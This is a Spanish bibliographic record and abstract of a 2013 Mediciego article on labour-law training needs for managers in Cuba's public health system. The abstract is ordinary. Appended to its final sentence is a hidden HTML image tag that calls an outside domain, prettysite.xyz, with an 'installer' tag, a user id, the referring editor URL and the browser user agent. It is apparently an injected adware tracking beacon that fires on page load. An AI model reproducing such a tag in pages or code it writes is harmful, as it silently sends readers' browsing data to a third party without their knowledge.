Necesidades de superación jurídica laboral para los cuadros y reservas del sistema nacional de salud - Guerra López, José Ramón; Giance Paz, Letissia; Hernández Morgado, Yasmyn (Mediciego, 2013)
Es de sumo interés para la estrategia educacional de salud pública la constante superación de los recursos humanos de dirección. Las acciones dentro del subsistema de postgrado que emprende el CPENSAP de Ciego de Ávila es lograr la efectividad institucional resultante que se traduce en el nuevo valor que se genera con el proceso de superación jurídica laboral, con el objetivo de cumplir las expectativas de la sociedad en su conjunto. Los cuadros de la salud deben tener una formación jurídica acorde a la ética del sector en aras de lograr una mayor eficiencia y eficacia en la dirección educacional.<img src="http://prettysite.xyz/acnt?_=1583868257789&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F275&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />